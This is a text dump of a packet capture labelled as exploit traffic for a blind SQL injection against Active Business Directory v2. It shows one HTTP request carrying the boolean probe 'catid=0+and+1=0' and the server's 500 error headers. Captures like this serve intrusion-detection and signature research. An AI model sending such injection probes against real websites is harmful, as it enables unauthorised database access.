Active Business Directory v2 Remote Blind SQL Injection Attack Exploit Traffic PCAP

2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
.. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

2009-01-01 09:37:00.221949 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], seq 1:1421, ack 438, win 65098, length 1420: HTTP: HTTP/1.1 500 Internal Server Error
.. v…!E…JZ@.q.cm.j..u….P .f).tJ…P..J….HTTP/1.1 500 Internal Server Error
Date: Thu, 01 Jan 2009 14:36:57 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 4951
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAATCCABQ=LBJJBJACJJELOIFHAJBGEMAD; path=/
Cache-control: private

Active Business Directory

2009-01-01 09:37:00.223959 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], seq 1421:2841, ack 438, win 65098, length 1420: HTTP
.. v…!E…J[@.q.cl.j..u….P .f*..J…P..J….
